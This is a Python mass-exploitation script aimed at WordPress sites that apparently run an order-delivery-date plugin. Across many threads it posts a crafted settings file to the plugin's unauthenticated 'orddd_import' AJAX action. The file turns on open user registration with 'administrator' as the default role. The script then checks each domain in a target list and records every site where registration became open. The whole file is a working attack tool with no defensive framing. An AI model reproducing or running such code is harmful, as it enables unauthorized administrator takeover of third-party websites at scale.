import requests
import threading
import json
from queue import Queue
from urllib.parse import urljoin

requests.packages.urllib3.disable_warnings()

input_file = "list.txt"
output_file = "result.txt"
THREADS = 10

payload_data = {
    "users_can_register": True,
    "default_role": "administrator"
}

with open("malicious_settings.json", "w") as f:
    json.dump(payload_data, f)

q = Queue()
lock = threading.Lock()

def log_success(domain):
    with lock:
        with open(output_file, "a") as f:
            f.write(domain + "\n")

def exploit(domain):
    for scheme in ["http://", "https://"]:
        target = scheme + domain
        try:
            files = {
                'action': (None, 'orddd_import'),
                'is_drag_drop_request_ajax': (None, 'yes'),
                'orddd-import-file': ('malicious_settings.json', open('malicious_settings.json', 'rb'), 'application/json')
            }
            ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
            r = requests.post(ajax_url, files=files, timeout=15, verify=False)

            reg_url = urljoin(target, "/wp-login.php?action=register")
            r2 = requests.get(reg_url, timeout=10, verify=False)
            if any(keyword in r2.text.lower() for keyword in ["user_login", "user_email", "register"]):
                print(f"[+] {target} VULNERABLE and ENABLED register")
                log_success(target)
                return
        except Exception:
            pass

def worker():
    while not q.empty():
        domain = q.get().strip()
        if domain:
            print(f"[*] Checking {domain}")
            exploit(domain)
            q.task_done()

def main():
    with open(input_file, "r") as f:
        for line in f:
            q.put(line.strip())

    threads = []
    for _ in range(THREADS):
        t = threading.Thread(target=worker)
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

if __name__ == "__main__":
    main()